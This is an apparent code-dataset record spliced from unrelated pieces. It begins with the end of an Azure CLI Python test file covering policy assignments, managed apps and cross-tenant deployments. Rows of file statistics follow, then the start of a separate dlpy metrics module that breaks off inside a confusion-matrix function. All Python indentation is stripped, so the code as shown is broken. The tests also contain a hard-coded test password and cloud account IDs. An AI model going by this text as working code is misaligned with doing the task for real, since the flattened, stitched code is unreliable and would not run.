self.check('displayName', '{dn}'),
self.check('id', '{id}')
])
# Because the policy assignment name is generated randomly and automatically, the value of each run is different,
# so it cannot be rerecord.
@ResourceGroupPreparer(name_prefix='cli_test_resource_create_policy_assignment_random')
@AllowLargeResponse(4096)
@live_only()
def test_resource_create_policy_assignment_random(self, resource_group, management_group=None, subscription=None):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'pn': self.create_random_name('azure-cli-test-policy', 30),
'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\'),
'pdn': self.create_random_name('test_policy', 20),
'desc': 'desc_for_test_policy_123',
'padn': self.create_random_name('test_assignment', 20),
'params': os.path.join(curr_dir, 'sample_policy_param.json').replace('\\', '\\\\')
})
self.cmd('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn} --description {desc}', management_group, subscription)
self.kwargs['pan_random'] = self.cmd('policy assignment create --policy {pn} --display-name {padn} -g {rg} --params "{params}"', checks=[
self.check('displayName', '{padn}'),
self.check('sku.name', 'A0'),
self.check('sku.tier', 'Free'),
]).get_output_in_json()['name']
# clean policy assignment and policy
self.cmd('policy assignment delete -n {pan_random} -g {rg}')
self.cmd('policy assignment list --disable-scope-strict-match',
checks=self.check("length([?name=='{pan_random}'])", 0))
cmd = self.cmdstring('policy definition delete -n {pn}', management_group, subscription)
self.cmd(cmd)
time.sleep(10)
cmd = self.cmdstring('policy definition list', management_group, subscription)
self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 0))
class ManagedAppDefinitionScenarioTest(ScenarioTest):
@AllowLargeResponse()
@ResourceGroupPreparer()
def test_managedappdef(self, resource_group):
self.kwargs.update({
'upn': self.create_random_name('testuser', 15) + '@azuresdkteam.onmicrosoft.com',
'sub': self.get_subscription_id()
})
user_principal = self.cmd(
'ad user create --display-name tester123 --password Test123456789 --user-principal-name {upn}').get_output_in_json()
time.sleep(15) # By-design, it takes some time for RBAC system propagated with graph object change
principal_id = user_principal['objectId']
with mock.patch('azure.cli.command_modules.role.custom._gen_guid', side_effect=self.create_guid):
role_assignment = self.cmd(
'role assignment create --assignee {upn} --role contributor --scope "/subscriptions/{sub}" ').get_output_in_json()
from msrestazure.tools import parse_resource_id
role_definition_id = parse_resource_id(role_assignment['roleDefinitionId'])['name']
self.kwargs.update({
'loc': 'eastus',
'adn': self.create_random_name('testappdefname', 20),
'addn': self.create_random_name('test_appdef', 20),
'ad_desc': 'test_appdef_123',
'uri': 'https://raw.githubusercontent.com/Azure/azure-managedapp-samples/master/Managed%20Application%20Sample%20Packages/201-managed-storage-account/managedstorage.zip',
'auth': principal_id + ':' + role_definition_id,
'lock': 'None'
})
# create a managedapp definition
self.kwargs['ad_id'] = self.cmd('managedapp definition create -n {adn} --package-file-uri {uri} --display-name {addn} --description {ad_desc} -l {loc} -a {auth} --lock-level {lock} -g {rg}', checks=[
self.check('name', '{adn}'),
self.check('displayName', '{addn}'),
self.check('description', '{ad_desc}'),
self.check('authorizations[0].principalId', principal_id),
self.check('authorizations[0].roleDefinitionId', role_definition_id),
self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
self.check('artifacts[0].type', 'Template'),
self.check('artifacts[1].name', 'CreateUiDefinition'),
self.check('artifacts[1].type', 'Custom')
]).get_output_in_json()['id']
self.cmd('managedapp definition list -g {rg}',
checks=self.check('[0].name', '{adn}'))
self.cmd('managedapp definition show --ids {ad_id}', checks=[
self.check('name', '{adn}'),
self.check('displayName', '{addn}'),
self.check('description', '{ad_desc}'),
self.check('authorizations[0].principalId', principal_id),
self.check('authorizations[0].roleDefinitionId', role_definition_id),
self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
self.check('artifacts[0].type', 'Template'),
self.check('artifacts[1].name', 'CreateUiDefinition'),
self.check('artifacts[1].type', 'Custom')
])
self.cmd('managedapp definition delete -g {rg} -n {adn}')
self.cmd('managedapp definition list -g {rg}', checks=self.is_empty())
self.cmd('role assignment delete --assignee {upn} --role contributor ')
self.cmd('ad user delete --upn-or-object-id {upn}')
@AllowLargeResponse()
@ResourceGroupPreparer()
def test_managedappdef_inline(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'upn': self.create_random_name('testuser', 15) + '@azuresdkteam.onmicrosoft.com',
'sub': self.get_subscription_id()
})
user_principal = self.cmd(
'ad user create --display-name tester123 --password Test123456789 --user-principal-name {upn}').get_output_in_json()
time.sleep(15) # By-design, it takes some time for RBAC system propagated with graph object change
principal_id = user_principal['objectId']
with mock.patch('azure.cli.command_modules.role.custom._gen_guid', side_effect=self.create_guid):
role_assignment = self.cmd(
'role assignment create --assignee {upn} --role contributor --scope "/subscriptions/{sub}" ').get_output_in_json()
from msrestazure.tools import parse_resource_id
role_definition_id = parse_resource_id(role_assignment['roleDefinitionId'])['name']
self.kwargs.update({
'loc': 'eastus',
'adn': self.create_random_name('testappdefname', 20),
'addn': self.create_random_name('test_appdef', 20),
'ad_desc': 'test_appdef_123',
'auth': principal_id + ':' + role_definition_id,
'lock': 'None',
'ui_file': os.path.join(curr_dir, 'sample_create_ui_definition.json').replace('\\', '\\\\'),
'main_file': os.path.join(curr_dir, 'sample_main_template.json').replace('\\', '\\\\')
})
# create a managedapp definition with inline params for create-ui-definition and main-template
self.kwargs['ad_id'] = self.cmd('managedapp definition create -n {adn} --create-ui-definition @"{ui_file}" --main-template @"{main_file}" --display-name {addn} --description {ad_desc} -l {loc} -a {auth} --lock-level {lock} -g {rg}', checks=[
self.check('name', '{adn}'),
self.check('displayName', '{addn}'),
self.check('description', '{ad_desc}'),
self.check('authorizations[0].principalId', principal_id),
self.check('authorizations[0].roleDefinitionId', role_definition_id),
self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
self.check('artifacts[0].type', 'Template'),
self.check('artifacts[1].name', 'CreateUiDefinition'),
self.check('artifacts[1].type', 'Custom')
]).get_output_in_json()['id']
self.cmd('managedapp definition list -g {rg}',
checks=self.check('[0].name', '{adn}'))
self.cmd('managedapp definition show --ids {ad_id}', checks=[
self.check('name', '{adn}'),
self.check('displayName', '{addn}'),
self.check('description', '{ad_desc}'),
self.check('authorizations[0].principalId', principal_id),
self.check('authorizations[0].roleDefinitionId', role_definition_id),
self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
self.check('artifacts[0].type', 'Template'),
self.check('artifacts[1].name', 'CreateUiDefinition'),
self.check('artifacts[1].type', 'Custom')
])
self.cmd('managedapp definition delete -g {rg} -n {adn}')
self.cmd('managedapp definition list -g {rg}', checks=self.is_empty())
self.cmd('role assignment delete --assignee {upn} --role contributor ')
self.cmd('ad user delete --upn-or-object-id {upn}')
class ManagedAppScenarioTest(ScenarioTest):
@AllowLargeResponse()
@ResourceGroupPreparer()
def test_managedapp(self, resource_group):
self.kwargs.update({
'upn': self.create_random_name('testuser', 15) + '@azuresdkteam.onmicrosoft.com',
'sub': self.get_subscription_id()
})
user_principal = self.cmd('ad user create --display-name tester123 --password Test123456789 --user-principal-name {upn}').get_output_in_json()
time.sleep(15) # By-design, it takes some time for RBAC system propagated with graph object change
with mock.patch('azure.cli.command_modules.role.custom._gen_guid', side_effect=self.create_guid):
role_assignment = self.cmd('role assignment create --assignee {upn} --role contributor --scope "/subscriptions/{sub}" ').get_output_in_json()
from msrestazure.tools import parse_resource_id
role_definition_id = parse_resource_id(role_assignment['roleDefinitionId'])['name']
self.kwargs.update({
'loc': 'westcentralus',
'adn': 'testappdefname',
'addn': 'test_appdef_123',
'ad_desc': 'test_appdef_123',
'uri': 'https://github.com/Azure/azure-managedapp-samples/raw/master/Managed%20Application%20Sample%20Packages/201-managed-storage-account/managedstorage.zip',
'auth': user_principal['objectId'] + ':' + role_definition_id,
'lock': 'None',
'rg': resource_group
})
self.kwargs['ad_id'] = self.cmd('managedapp definition create -n {adn} --package-file-uri {uri} --display-name {addn} --description {ad_desc} -l {loc} -a {auth} --lock-level {lock} -g {rg}').get_output_in_json()['id']
# create a managedapp
self.kwargs.update({
'man': 'mymanagedapp',
'ma_loc': 'westcentralus',
'ma_kind': 'servicecatalog',
'ma_rg': self.create_random_name('climanagedapp', 25),
'param': '\'{\"storageAccountNamePrefix\": {\"value\": \"mytest\"}, \"storageAccountType\": {\"value\": \"Standard_LRS\"}}\''
})
self.kwargs['ma_rg_id'] = '/subscriptions/{sub}/resourceGroups/{ma_rg}'.format(**self.kwargs)
self.kwargs['ma_id'] = self.cmd('managedapp create -n {man} -g {rg} -l {ma_loc} --kind {ma_kind} -m {ma_rg_id} -d {ad_id} --parameters {param} --tags "key=val" ', checks=[
self.check('name', '{man}'),
self.check('type', 'Microsoft.Solutions/applications'),
self.check('kind', 'servicecatalog'),
self.check('managedResourceGroupId', '{ma_rg_id}'),
self.check('tags', {'key': 'val'})
]).get_output_in_json()['id']
self.cmd('managedapp list -g {rg}', checks=self.check('[0].name', '{man}'))
self.cmd('managedapp show --ids {ma_id}', checks=[
self.check('name', '{man}'),
self.check('type', 'Microsoft.Solutions/applications'),
self.check('kind', 'servicecatalog'),
self.check('managedResourceGroupId', '{ma_rg_id}')
])
self.cmd('managedapp delete -g {rg} -n {man}')
self.cmd('managedapp list -g {rg}', checks=self.is_empty())
self.cmd('role assignment delete --assignee {upn} --role contributor ')
self.cmd('ad user delete --upn-or-object-id {upn}')
class CrossRGDeploymentScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_cross_rg_alt', parameter_name='resource_group_cross')
@ResourceGroupPreparer(name_prefix='cli_test_cross_rg_deploy')
def test_group_deployment_crossrg(self, resource_group, resource_group_cross):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'rg1': resource_group,
'rg2': resource_group_cross,
'tf': os.path.join(curr_dir, 'crossrg_deploy.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-crossrgdeployment', 40),
'sa1': create_random_name(prefix='crossrg'),
'sa2': create_random_name(prefix='crossrg')
})
self.cmd('group deployment validate -g {rg1} --template-file "{tf}" --parameters CrossRg={rg2} StorageAccountName1={sa1} StorageAccountName2={sa2}', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
with self.assertRaises(CLIError):
self.cmd('group deployment validate -g {rg1} --template-file "{tf}" --parameters CrossRg=SomeRandomRG StorageAccountName1={sa1} StorageAccountName2={sa2}')
self.cmd('group deployment create -g {rg1} -n {dn} --template-file "{tf}" --parameters CrossRg={rg2}', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg1}'),
])
self.cmd('group deployment list -g {rg1}', checks=[
self.check('[0].name', '{dn}'),
self.check('[0].resourceGroup', '{rg1}')
])
self.cmd('group deployment show -g {rg1} -n {dn}', checks=[
self.check('name', '{dn}'),
self.check('resourceGroup', '{rg1}')
])
self.cmd('group deployment operation list -g {rg1} -n {dn}', checks=[
self.check('length([])', 3),
self.check('[0].resourceGroup', '{rg1}')
])
class CrossTenantDeploymentScenarioTest(LiveScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_cross_tenant_deploy', location='eastus')
def test_group_deployment_cross_tenant(self, resource_group):
# Prepare Network Interface
self.kwargs.update({
'vm_rg': resource_group,
'vnet': 'clivmVNET',
'subnet': 'clivmSubnet',
'nsg': 'clivmNSG',
'ip': 'clivmPublicIp',
'nic': 'clivmVMNic'
})
self.cmd('network vnet create -n {vnet} -g {vm_rg} --subnet-name {subnet}')
self.cmd('network nsg create -n {nsg} -g {vm_rg}')
self.cmd('network public-ip create -n {ip} -g {vm_rg} --allocation-method Dynamic')
res = self.cmd('network nic create -n {nic} -g {vm_rg} --subnet {subnet} --vnet {vnet} --network-security-group {nsg} --public-ip-address {ip}').get_output_in_json()
self.kwargs.update({
'nic_id': res['NewNIC']['id']
})
# Prepare SIG in another tenant
self.kwargs.update({
'location': 'eastus',
'vm': self.create_random_name('cli_crosstenantvm', 40),
'gallery': self.create_random_name('cli_crosstenantgallery', 40),
'image': self.create_random_name('cli_crosstenantimage', 40),
'version': '1.1.2',
'captured': self.create_random_name('cli_crosstenantmanagedimage', 40),
'aux_sub': '1c638cf4-608f-4ee6-b680-c329e824c3a8',
'rg': self.create_random_name('cli_test_cross_tenant_rg', 40),
'aux_tenant': '72f988bf-86f1-41af-91ab-2d7cd011db47'
})
self.cmd('group create -g {rg} --location {location} --subscription {aux_sub}',
checks=self.check('name', self.kwargs['rg']))
self.cmd('sig create -g {rg} --gallery-name {gallery} --subscription {aux_sub}', checks=self.check('name', self.kwargs['gallery']))
self.cmd('sig image-definition create -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --os-type linux -p publisher1 -f offer1 -s sku1 --subscription {aux_sub}',
checks=self.check('name', self.kwargs['image']))
self.cmd('sig image-definition show -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --subscription {aux_sub}',
checks=self.check('name', self.kwargs['image']))
self.cmd('vm create -g {rg} -n {vm} --image ubuntults --admin-username clitest1 --generate-ssh-key --subscription {aux_sub}')
self.cmd(
'vm run-command invoke -g {rg} -n {vm} --command-id RunShellScript --scripts "echo \'sudo waagent -deprovision+user --force\' | at -M now + 1 minutes" --subscription {aux_sub}')
time.sleep(70)
self.cmd('vm deallocate -g {rg} -n {vm} --subscription {aux_sub}')
self.cmd('vm generalize -g {rg} -n {vm} --subscription {aux_sub}')
self.cmd('image create -g {rg} -n {captured} --source {vm} --subscription {aux_sub}')
res = self.cmd(
'sig image-version create -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --gallery-image-version {version} --managed-image {captured} --replica-count 1 --subscription {aux_sub}').get_output_in_json()
self.kwargs.update({
'sig_id': res['id']
})
# Cross tenant deploy
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'crosstenant_vm_deploy.json').replace('\\', '\\\\'),
'dn': self.create_random_name('cli-crosstenantdeployment', 40),
'dn1': self.create_random_name('cli-crosstenantdeployment1', 40),
'dn2': self.create_random_name('cli-crosstenantdeployment2', 40),
'dn3': self.create_random_name('cli-crosstenantdeployment3', 40)
})
self.cmd('group deployment validate -g {vm_rg} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id}', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('group deployment create -g {vm_rg} -n {dn} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-subs "{aux_sub}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('group deployment list -g {vm_rg}', checks=[
self.check('[0].name', '{dn}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('group deployment show -g {vm_rg} -n {dn}', checks=[
self.check('name', '{dn}'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('group deployment create -g {vm_rg} -n {dn1} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-tenants "{aux_tenant}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('group deployment list -g {vm_rg}', checks=[
self.check('[0].name', '{dn1}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('group deployment show -g {vm_rg} -n {dn1}', checks=[
self.check('name', '{dn1}'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('group deployment create -g {vm_rg} -n {dn2} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-subs "{aux_sub}" -j', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('group deployment list -g {vm_rg}', checks=[
self.check('[0].name', '{dn2}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('group deployment show -g {vm_rg} -n {dn2}', checks=[
self.check('name', '{dn2}'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('group deployment create -g {vm_rg} -n {dn3} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-tenants "{aux_tenant}" -j', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('group deployment list -g {vm_rg}', checks=[
self.check('[0].name', '{dn3}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('group deployment show -g {vm_rg} -n {dn3}', checks=[
self.check('name', '{dn3}'),
self.check('resourceGroup', '{vm_rg}')
])
with self.assertRaises(AssertionError):
self.cmd('group deployment create -g {vm_rg} -n {dn} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-tenants "{aux_tenant}" --aux-subs "{aux_sub}"')
@ResourceGroupPreparer(name_prefix='cli_test_deployment_group_cross_tenant', location='eastus')
def test_deployment_group_cross_tenant(self, resource_group):
# Prepare Network Interface
self.kwargs.update({
'vm_rg': resource_group,
'vnet': 'clivmVNET',
'subnet': 'clivmSubnet',
'nsg': 'clivmNSG',
'ip': 'clivmPublicIp',
'nic': 'clivmVMNic'
})
self.cmd('network vnet create -n {vnet} -g {vm_rg} --subnet-name {subnet}')
self.cmd('network nsg create -n {nsg} -g {vm_rg}')
self.cmd('network public-ip create -n {ip} -g {vm_rg} --allocation-method Dynamic')
res = self.cmd('network nic create -n {nic} -g {vm_rg} --subnet {subnet} --vnet {vnet} --network-security-group {nsg} --public-ip-address {ip}').get_output_in_json()
self.kwargs.update({
'nic_id': res['NewNIC']['id']
})
# Prepare SIG in another tenant
self.kwargs.update({
'location': 'eastus',
'vm': self.create_random_name('cli_crosstenantvm', 40),
'gallery': self.create_random_name('cli_crosstenantgallery', 40),
'image': self.create_random_name('cli_crosstenantimage', 40),
'version': '1.1.2',
'captured': self.create_random_name('cli_crosstenantmanagedimage', 40),
'aux_sub': '1c638cf4-608f-4ee6-b680-c329e824c3a8',
'rg': self.create_random_name('cli_test_cross_tenant_rg', 40),
'aux_tenant': '72f988bf-86f1-41af-91ab-2d7cd011db47'
})
self.cmd('group create -g {rg} --location {location} --subscription {aux_sub}',
checks=self.check('name', self.kwargs['rg']))
self.cmd('sig create -g {rg} --gallery-name {gallery} --subscription {aux_sub}', checks=self.check('name', self.kwargs['gallery']))
self.cmd('sig image-definition create -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --os-type linux -p publisher1 -f offer1 -s sku1 --subscription {aux_sub}',
checks=self.check('name', self.kwargs['image']))
self.cmd('sig image-definition show -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --subscription {aux_sub}',
checks=self.check('name', self.kwargs['image']))
self.cmd('vm create -g {rg} -n {vm} --image ubuntults --admin-username clitest1 --generate-ssh-key --subscription {aux_sub}')
self.cmd(
'vm run-command invoke -g {rg} -n {vm} --command-id RunShellScript --scripts "echo \'sudo waagent -deprovision+user --force\' | at -M now + 1 minutes" --subscription {aux_sub}')
time.sleep(70)
self.cmd('vm deallocate -g {rg} -n {vm} --subscription {aux_sub}')
self.cmd('vm generalize -g {rg} -n {vm} --subscription {aux_sub}')
self.cmd('image create -g {rg} -n {captured} --source {vm} --subscription {aux_sub}')
res = self.cmd(
'sig image-version create -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --gallery-image-version {version} --managed-image {captured} --replica-count 1 --subscription {aux_sub}').get_output_in_json()
self.kwargs.update({
'sig_id': res['id']
})
# Cross tenant deploy
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'crosstenant_vm_deploy.json').replace('\\', '\\\\'),
'dn': self.create_random_name('cli-crosstenantdeployment', 40),
'dn1': self.create_random_name('cli-crosstenantdeployment1', 40),
'dn2': self.create_random_name('cli-crosstenantdeployment2', 40),
'dn3': self.create_random_name('cli-crosstenantdeployment3', 40)
})
self.cmd('deployment group validate -g {vm_rg} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id}', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment group create -g {vm_rg} -n {dn} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-subs "{aux_sub}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('deployment group list -g {vm_rg}', checks=[
self.check('[0].name', '{dn}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('deployment group show -g {vm_rg} -n {dn}', checks=[
self.check('name', '{dn}'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('deployment group create -g {vm_rg} -n {dn1} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-tenants "{aux_tenant}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('deployment group list -g {vm_rg}', checks=[
self.check('[0].name', '{dn1}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('deployment group show -g {vm_rg} -n {dn1}', checks=[
self.check('name', '{dn1}'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('deployment group create -g {vm_rg} -n {dn2} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-subs "{aux_sub}" -j', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('deployment group list -g {vm_rg}', checks=[
self.check('[0].name', '{dn2}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('deployment group show -g {vm_rg} -n {dn2}', checks=[
self.check('name', '{dn2}'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('deployment group create -g {vm_rg} -n {dn3} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-tenants "{aux_tenant}" -j', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{vm_rg}')
])
self.cmd('deployment group list -g {vm_rg}', checks=[
self.check('[0].name', '{dn3}'),
self.check('[0].resourceGroup', '{vm_rg}')
])
self.cmd('deployment group show -g {vm_rg} -n {dn3}', checks=[
self.check('name', '{dn3}'),
self.check('resourceGroup', '{vm_rg}')
])
with self.assertRaises(AssertionError):
self.cmd('deployment group create -g {vm_rg} -n {dn} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-tenants "{aux_tenant}" --aux-subs "{aux_sub}"')
class InvokeActionTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_invoke_action')
def test_invoke_action(self, resource_group):
self.kwargs.update({
'vm': self.create_random_name('cli-test-vm', 30),
'user': 'ubuntu',
'pass': self.create_random_name('Longpassword#1', 30)
})
self.kwargs['vm_id'] = self.cmd('vm create -g {rg} -n {vm} --use-unmanaged-disk --image UbuntuLTS --admin-username {user} --admin-password {pass} --authentication-type password --nsg-rule None').get_output_in_json()['id']
self.cmd('resource invoke-action --action powerOff --ids {vm_id}')
self.cmd('resource invoke-action --action generalize --ids {vm_id}')
self.cmd('resource invoke-action --action deallocate --ids {vm_id}')
self.kwargs['request_body'] = '{\\"vhdPrefix\\":\\"myPrefix\\",\\"destinationContainerName\\":\\"container\\",\\"overwriteVhds\\":\\"true\\"}'
self.cmd('resource invoke-action --action capture --ids {vm_id} --request-body {request_body}')
class GlobalIdsScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_global_ids')
def test_global_ids(self, resource_group):
self.kwargs.update({
'vnet': 'vnet1'
})
self.kwargs['vnet_id'] = self.cmd('network vnet create -g {rg} -n {vnet}').get_output_in_json()['newVNet']['id']
# command will fail if the other parameters were actually used
self.cmd('network vnet show --subscription fakesub --resource-group fakerg -n fakevnet --ids {vnet_id}')
class ResourceGroupLocalContextScenarioTest(LocalContextScenarioTest):
def test_resource_group_local_context(self):
self.kwargs.update({
'group1': 'test_local_context_group_1',
'group2': 'test_local_context_group_2',
'location': 'eastasia'
})
self.cmd('group create -n {group1} -l {location}', checks=[
self.check('name', self.kwargs['group1']),
self.check('location', self.kwargs['location'])
])
self.cmd('group show', checks=[
self.check('name', self.kwargs['group1']),
self.check('location', self.kwargs['location'])
])
with self.assertRaisesRegexp(SystemExit, '2'):
self.cmd('group delete')
self.cmd('group delete -n {group1} -y')
self.cmd('group create -n {group2}', checks=[
self.check('name', self.kwargs['group2']),
self.check('location', self.kwargs['location'])
])
self.cmd('group delete -n {group2} -y')
if __name__ == '__main__':
unittest.main()
| 53.200062
| 473
| 0.62384
| 19,778
| 172,049
| 5.251947
| 0.048741
| 0.038817
| 0.043322
| 0.025416
| 0.851521
| 0.821157
| 0.776766
| 0.741588
| 0.711321
| 0.684028
| 0
| 0.009829
| 0.209952
| 172,049
| 3,233
| 474
| 53.216517
| 0.754353
| 0.032822
| 0
| 0.632382
| 0
| 0.079148
| 0.437922
| 0.127753
| 0
| 0
| 0
| 0
| 0.029731
| 1
| 0.036963
| false
| 0.002411
| 0.007634
| 0
| 0.060667
| 0.002411
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0ad65e62c831e21cea3d4b4e06d2a132c008f0af
| 46,020
|
py
|
Python
|
dlpy/metrics.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2018-08-27T15:10:11.000Z
|
2018-08-27T15:10:11.000Z
|
dlpy/metrics.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | null | null | null |
dlpy/metrics.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2019-09-19T15:59:26.000Z
|
2019-09-19T15:59:26.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' Evaluation metrics for classification and regression tasks '''
from .utils import random_name
from swat.cas.table import CASColumn
from swat.cas.table import CASTable
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import warnings
def confusion_matrix(y_true, y_pred, castable=None, labels=None, id_vars=None):
'''
Computes the confusion matrix of a classification task.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted class labels. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
labels : list, optional
List of labels that can be used to reorder the matrix or
select the subset of the labels. If ``labels=None``,
all labels are included.
Default=None
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None
Returns
-------
:class:`pandas.DataFrame`
The column index is the predicted class labels.
The row index is the ground truth class labels.
'''
check_results = _check_inputs(y_true, y_pred, castable=castable,
return_target_dtype=True, id_vars=id_vars)
y_true = check_results[0]
y_pred = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
target_dtype = check_results[5]
res = castable.retrieve('crosstab',
_messagelevel='error',
row=y_true, col=y_pred)
conf_mat = res['Crosstab']
# make conf_mat to be a symmetric
# collect class info from rows and cols
row_class = [x.strip() for x in conf_mat.iloc[:,0].values]
col_class = [conf_mat.colinfo[x].label for x in conf_mat.columns.values][1:]
# use union to get the total number of classes
import collections
collections.OrderedDict.fromkeys(row_class).keys()
collections.OrderedDict.fromkeys(col_class).keys()
tot_class = set(row_class).union(set(col_class))
# generate the full matrix
cls_list = list(tot_class)
cls_list.sort()
ret = np.zeros((len(tot_class), len(tot_class))) # dummy array
for i, row in conf_mat.iterrows():
irow = cls_list.index(row.iloc[0].strip())
for j, col in enumerate(conf_mat.iloc[i, 1:]):
icol = cls_list.index(col_class[j])
# print(irow, icol, j, col)
ret[int(irow), int(icol)] = col
import pandas as pd
conf_mat = pd.DataFrame(data=ret, columns=cls_list, index=cls_list)
#change the index column name
conf_mat.index.names = [y_true]
if target_dtype == 'double':
target_index_dtype = np.float64
#conf_mat[y_true] = conf_mat[y_true].astype(target_index_dtype)
elif target_dtype.startswith('int'):
target_index_dtype = getattr(np, target_dtype)
#conf_mat[y_true] = conf_mat[y_true].astype(target_index_dtype)
else:
target_index_dtype = 'str'
conf_mat.index = conf_mat.index.astype(target_index_dtype)
#conf_mat.set_index(y_true, inplace=True)
#conf_mat.columns = conf_mat.index.copy()
#conf_mat.columns.name = y_pred
if tmp_table_created: # if tmp_table_created, tbl_name referes to the temporary table name
